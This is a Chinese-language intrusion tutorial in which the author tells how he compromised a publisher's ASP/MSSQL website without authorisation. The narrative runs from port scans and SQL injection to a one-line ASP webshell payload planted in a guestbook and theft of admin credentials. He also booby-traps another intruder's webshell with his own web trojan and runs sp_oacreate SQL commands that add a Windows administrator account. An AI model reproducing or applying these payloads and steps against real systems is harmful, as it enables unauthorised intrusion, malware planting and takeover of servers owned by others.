一.“战争”序幕的拉开
笔者最近在学习汇编,朋友推荐了一本不错的书,跑遍了附近的书店都没有找到,于是在baidu搜到了该出版社的网站,刚一打开,KV网页监控马上报告“发现病毒已经清除”如图1
这种网站都会被人挂上木马,幸好打过补丁了,要不系统就遭殃了!
发现有网页木马存在
小提示
网页木马的原理都是利用一些IE的漏洞来运行程序(一般都是木马程序),现在流行的网页木马如:XP+SP2的网页木马,最近新出了一个利用'Help Control Local Zone Bypass"的网页木马,需要的朋友可以去网上搜搜,一般黑客站点都有的。勤打补丁的话像市面上公布出来的网页木马就算打开了也没有关系的!
看了一下这个网站支持在线购买图书,反正也没事干,那么就开始吧!
二.轮番轰炸
既然已经被人挂了木马,那就是有人进去过了,大体观察了一下,它的网站是ASP+MSSQL的,没有什么论坛,看来想拿webshell不是很容易。
还是看看它开了什么端口吧!
小提示
菜鸟:为什么很多文章中都提到扫描端口,扫描端口到底有什么用呢?
答:理论的东西不想多讲了,通常说的扫描端口是指扫描TCP端口,系统中的每个网络服务要与外部通信就必须用到端口,什么意思呢?
就好比你跟聋哑人沟通用的是手语,不同的系统服务会用到不同的端口,比如开网站的服务器,就肯定开放了80端口,根据端口的开放情况可以判断对方开了哪些服务从而方便我们找对应的漏洞或者溢出!一会儿功夫扫描结果就出来了,图2
开了80,110,25,1433,3389这几个端口,110和25是发送邮件时用到的,3389不知道是先前的入侵者开的还是管理员自己管理用开的!IIS版本是5.0可能是win2K的服务器,我们登陆3389看看,为什么要登陆3389?登陆3389的目的主要是看看对方系统版本,图3
登陆3389远程控制端口查看对方操作系统
是windows2000服务器版的!知道了目标主机的一些基本信息,现在我们就针对这些信息来想出对应的入侵方案,110和25端口好像没什么重要的漏洞,所以先放一边,1433是MSSQL服务开放的端口,默认帐户sa不知道有没有弱口令,试试看,用SQL综合利用工具连接用户SA,密码为空试试,图4,
连接失败,密码不为空
提示连接失败,看来密码不为空,再试试sqlhello-SQL溢出看看对方MSSQL打没有打SP3(现在国内很多你无法想象的超级大站还存在这种低级漏洞呢!),图5
发现普通的溢出无效
正向和反向的溢出都试过都是不行,看来这个漏洞是没有了!剩下的只有80端口了,一般这个都是找脚本漏洞,在网站上找形如“xxx.asp?id=1"这样的页面,这个站上有很多,随便试一个在后面加个单引号看看,图6
在地址上加个单引号,产生错误了
一般出现像“错误 '80040e14' ”这样的都是说明存在SQL注入,那句“ODBC SQL Server Driver”一般有“ODBC”的说明是MSSQL数据库的,要是提示“JET”那就是ACCESS数据库了!我们再用工具找找看,拿出“啊D注入工具”扫扫,然后笔者用“HDSI”注入(完全是个人习惯!),在啊D中的“注入点扫描”中输入网站的URL,点击右边第一个按钮就会自动检测了,图7
马上将注入点复制到HDSI中进行注入,点击“开始”,图8,
发现有漏洞,尝试注入
用注入工具扫描
连接数据库的用户居然是SA,一条思路马上展现在眼前,就是用HDSI找到web目录,然后通过数据库备份上传ASP木马,hoho!点击HDSI左边的“列目录”开始寻找网站目录,终于被笔者找到了,图9
d:\xxxxhome下,马上将一个ASP木马的后缀改为txt用HDSI上传到web目录下,图10
上传文件失败了
提示“上传文件不成功!”怎么办?没事既然是sa的权限不能这样上传还有别的办法,试了试用xp_cmdshell直接加用户,TFTP上传,写脚本上传统统失败了!
笔者想,既然这个站已经被人入侵过了,那么肯定会留下一些ASP木马要是能找到一个小的ASP木马不就可以上传大马了?继续找,再次来到网站目录下挨个看文件夹,突然看到一个MDB的目录,心情开始激动了,颤抖的手点了下去。图11
尝试一下这个目录可否上传
里面有个guestbook.asp还有个a.asp,看看路径写着d:\xxxxhome\liuyan\mdb\,各位读者猜到这是什么了么?对了留言板!
我们知道了默认数据库路径而且数据库以ASP结尾,如果在留言中插入那个一句话的ASP木马提交这样就会记录在数据库中,而数据库又是ASP结尾的这样就跟一个ASP木马一样了,访问数据库web地址页面出现了乱码,图12
页面出现了乱码
这样就是没有做防下载处理,然后马上在留言板中留言在“主页”还有其他地方都输入了“ <%eval request("#")%> ”提交成功,用海洋c端连接发现还是不成功(可能是被过滤掉了吧!)!怎么办呢?于是用迅雷下载了这个ASP数据库改名为MDB后打开,找出管理员账号密码,图13
管理员密码居然是没有MD5加密
登陆留言板,经过测试发现在管理员页面的公告中可以插入木马,图14这回成功拿到webshell了(图15 )
拿到管理权了
对了忘记告诉大家刚刚跟guestbook.asp同一目录下的那个a.asp就是别人留的海洋2006的asp木马!
小插曲
访问那个a.asp将html代码保存下来,这里的代码就是海洋2006的登陆界面,然后木马编辑那个a.asp将里面的代码全部清空掉,粘贴上刚刚复制的登陆页面的html代码,再在最下面挂上笔者的网页木马!这样只要那家伙访问自己的webshell虽然看到登陆界面了但是怎么也登陆不进去,而且还中了咱们的木马!
三.拿下目标
笔者用的也是海洋2006不过是加密免杀的,现在就是提权了,用海洋的“服务器相关数据”看了看开的服务,发现并没有安装serv-U,很多菜鸟看到这里可能就会放弃了!其实没有serv-u也没关系,毕竟条条大陆通罗马么!还记得刚刚注入时是SA的权限么?这就说明数据库连接用的是SA,到网站主页下随便打开一个ASP文件看看,图16
在主站打开一个ASP页面看看代码
“common/inc_const.asp”这个就是ASP被打开后先调用的数据库连接文件了,我们马上到该目录下的common找到inc_const.asp对它编辑,图17
发现数据库连接文件
怎么样?是不是有大发现了,其实提权就是这么简单!SA密码暴露无疑啊!
现在该怎么办呢?拿出SQL连接器输入密码连接上去,哈哈成功了,选择“利用目录”==》“执行DOS命令”加个用户试试,图18
执行DOS命令
发现xplog70.dll被删了,既然开了3389只要加个用户就可以了,加用户也不一定要用XP_cmdshell,可以试试别的转储过程,打开"SQL查询分析器分离版本"输入IP和密码点连接,图19
尝试连接
OK,我们在“查询”中输入:
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net user hack hack /add','0','true'
declare @cmd INT
exec sp_oacreate 'wscript.shell',@cmd output
exec sp_oamethod @cmd,'run',null,'net localgroup administrators hack /add','0','true'
这个就是增加一个hack的用户密码也是hack,再提升为管理员权限,图20
提升管理权限
怎么样?是不是条条大路通罗马?
用增加的用户登陆3389看看(图21)
用3389端口,果然成功登陆了!!
四.小结
由于篇幅问题还有很多入侵的过程没有写出来,这里写的是主要的部分,文章读起来很简单,笔者在实际中可是遇到很多问题,想告诉广大菜鸟朋友:真正的技术是实践出来的不是看出来的。